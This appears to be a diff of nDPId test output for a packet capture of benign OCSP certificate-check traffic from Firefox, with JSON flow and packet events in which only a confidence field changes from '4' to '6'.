00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222785875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785875,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGxC5cel\/rwKgBgABQqtACFmIrx0ULW6AScSDxGwAAAgQFtAQCCAqrs6x4tFZ4oAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8kYB7"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222785879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222785879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0JGJAAEAGl9TAqAGAXHpf66rQAFDHRQtbAhZiLIAQAfaPAgAAAQEICrRWeLCrs6x4GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcxJlyw=="} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223090984,"flow_last_seen":1623223090984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223090984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223090984,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8WOFAAEAGCBnAqAGAl4uADoYQAFC9BO7MAAAAAKAC+vBq5AAAAgQFtAQCCArLCQstAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk1G4o"} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223091009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091009,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADAGcPqXi4AOwKgBgABQhhCFN\/R2vQTuzaAS\/ohuswAAAgQFtAQCCAoBgn1XywkLLQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKwfqN"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223091014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091014,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0WOJAAEAGCCDAqAGAl4uADoYQAFC9BO7NhTf0d4AQAfaZ9AAAAQEICssJC0sBgn1XGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwg24A=="} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223091709,"flow_last_seen":1623223091709,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223091709,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623223091709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091709,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8XL5AAEAGBDzAqAGAl4uADoYkAFDUes8oAAAAAKAC+vBwKQAAAgQFtAQCCArLCQ4CAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACb3tkC"} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623223091736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091736,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAC8GcfqXi4AOwKgBgABQhiREDjpk1HrPKaAS\/\/+ohwAAAgQFtAQCCAp7mshzywkOAgEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvlhtb"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623223091739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091739,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0XL9AAEAGBEPAqAGAl4uADoYkAFDUes8pRA46ZYAQAfbVQAAAAQEICssJDiB7mshzGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApa33FQ=="} -00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} +00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} 
00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":158,"packets-processed":157,"total-skipped-flows":0,"total-l4-payload-len":15999,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1623226796047} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226796047,"flow_last_seen":1623226796047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1623226796047,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796047,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8IiFAAEAGHJ3AqAGAXbjcHbsgAFDKwHZTAAAAAKAC+vANzwAAAgQFtAQCCArJnn0eAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC2uJMq"} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1623226796050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796050,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8OIIAADgGTjxduNwdwKgBgABQuyB0cdYZysB2VKAS\/\/931wAAAgQFtAQCCAqXTK79yZ59HgEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApvHVR"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1623226796054,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623226796054,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0IiJAAEAGHKTAqAGAXbjcHbsgAFDKwHZUdHHWGoAQAfakpwAAAQEICsmefSaXTK79GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5srZww=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
-00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 
00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":208,"packets-processed":207,"total-skipped-flows":0,"total-l4-payload-len":19557,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1623227471703} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227471703,"flow_last_seen":1623227471703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1623227471703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471703,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CDlAAEAGLKrAqAGANFUPXMDmAFDpM3mLAAAAAKAC+vAljwAAAgQFtAQCCArD2jnWAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU0JsT"} 
00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1623227471715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471715,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8PJoAAPMGhUg0VQ9cwKgBgABQwOYt\/4+26TN5jKAS\/\/9VQwAAAgQFoAQCCAoCPQtLw9o51gEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrMGLg"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1623227471719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227471719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0CDpAAEAGLLHAqAGANFUPXMDmAFDpM3mMLf+Pt4AQAfaB9gAAAQEICsPaOecCPQtLGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY2fOA=="} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227472211,"flow_last_seen":1623227472211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227472211,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 